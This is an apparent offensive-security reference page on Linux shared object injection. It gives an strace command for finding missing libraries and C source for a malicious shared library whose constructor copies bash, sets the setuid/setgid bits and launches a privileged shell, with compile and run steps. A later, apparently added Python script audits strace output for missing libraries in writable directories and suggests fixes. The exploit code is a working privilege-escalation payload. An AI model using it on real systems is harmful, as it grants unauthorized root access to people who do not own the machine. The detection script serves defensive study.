killchain-compendium/exploit/linux/shared_object_injection.md


Shared Object Injection

Trace the binary's file lookups to find shared objects it tries to load but cannot find:

```sh
strace <binary> 2>&1 | grep -i -E "open|access|no such file"
```

Example

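```c
#include <stdio.h>
#include <stdlib.h>

/* The constructor attribute makes the dynamic loader call inject()
   as soon as the shared object is loaded, before main() runs. */
static void inject(void) __attribute__((constructor));

static void inject(void) {
    /* Copies bash, sets the setuid/setgid bits on the copy and starts it with -p. */
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
```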
  • gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c
  • Run the binary so that it loads the library
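
For the defensive side of the strace step above, this added example (not part of the original page) parses strace output and reports missing shared objects whose controlling directory can be written by someone other than root. The sample trace, the function names and the ownership/mode rule are assumptions made for illustration.

```python
import os
import re
import stat

# Failed library lookups as strace prints them, e.g.
#   openat(AT_FDCWD, "/opt/app/lib/libx.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (...)
MISSING_SO = re.compile(
    r'\b(?:openat|open|access)\((?:AT_FDCWD, )?"([^"]+\.so(?:\.\d+)*)".*= -1 ENOENT')

# Constructed sample trace (not captured from a real program).
SAMPLE_TRACE = [
    'access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)',
    'openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3',
    'openat(AT_FDCWD, "/home/user/.config/lib.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)',
]

def missing_shared_objects(lines):
    """Return, in order and without duplicates, the .so paths a trace failed to find."""
    seen = []
    for line in lines:
        m = MISSING_SO.search(line)
        if m and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen

def nearest_existing_dir(path):
    """Deepest existing ancestor; relative paths are assumed relative to our cwd."""
    d = os.path.dirname(os.path.abspath(path))
    while not os.path.isdir(d):
        d = os.path.dirname(d)
    return d

def dir_is_unsafe(st):
    """True if someone other than root can create files in a directory with this stat."""
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(lines):
    """List (missing_path, controlling_dir) pairs that a non-root user could fill in."""
    findings = []
    for path in missing_shared_objects(lines):
        d = nearest_existing_dir(path)
        if dir_is_unsafe(os.stat(d)):
            findings.append((path, d))
    return findings

if __name__ == "__main__":
    for path, d in audit(SAMPLE_TRACE):
        print(f"{path}: missing, and {d} is writable by a non-root user")
```

Each finding is resolved by removing the stale library reference from the binary or by making the controlling directory root-owned and not group- or world-writable.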